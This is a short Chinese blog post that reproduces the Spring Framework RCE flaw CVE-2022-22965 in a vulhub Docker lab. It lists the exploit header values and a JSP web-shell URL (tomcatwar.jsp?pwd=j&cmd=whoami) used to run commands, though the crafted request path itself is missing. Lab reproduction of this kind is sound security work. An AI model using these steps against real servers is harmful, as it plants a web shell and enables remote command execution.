Spring Framework远程代码执行漏洞(CVE-2022-22965)复现

1|0Spring Framework远程代码执行漏洞(CVE-2022-22965)复现

1|1漏洞复现

环境搭建

使用vulhub的docker环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/spring/CVE-2022-22965
docker-compose up -d

访问http:127.0.0.1:8080

构造请求地址

红色部分替换为

suffix: %>//
c1: Runtime
c2: <%
DNT: 1

访问

http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami

即可执行命令

__EOF__

本文作者：LRainner
本文链接：https://www.cnblogs.com/LRainner/p/16107266.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！

posted @ 2022-04-06 16:42 LRainner 阅读(243) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· PHP-FPM 远程代码执行漏洞（CVE-2019-11043）复现

· 永恒之蓝漏洞（CVE-2017-0144）复现

· Spring Framework 远程命令执行漏洞复现(CVE-2022-22965)

· Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

· CVE-2022-22965 Spring Framework远程代码执行漏洞复现

阅读排行：
· TypeScript + Deepseek 打造卜卦网站：技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗？
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句：使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维：从隐藏、稳定开始理解其本质意义

公告

Spring Framework远程代码执行漏洞(CVE-2022-22965)复现

发表于 2022-04-06 16:42阅读次数：243评论次数：0

CVE 漏洞复现

0

0

关注

跳至底部

昵称： LRainner
园龄： 4年11个月
粉丝： 5
关注： 4

最新随笔

随笔档案 (24)

阅读排行榜

推荐排行榜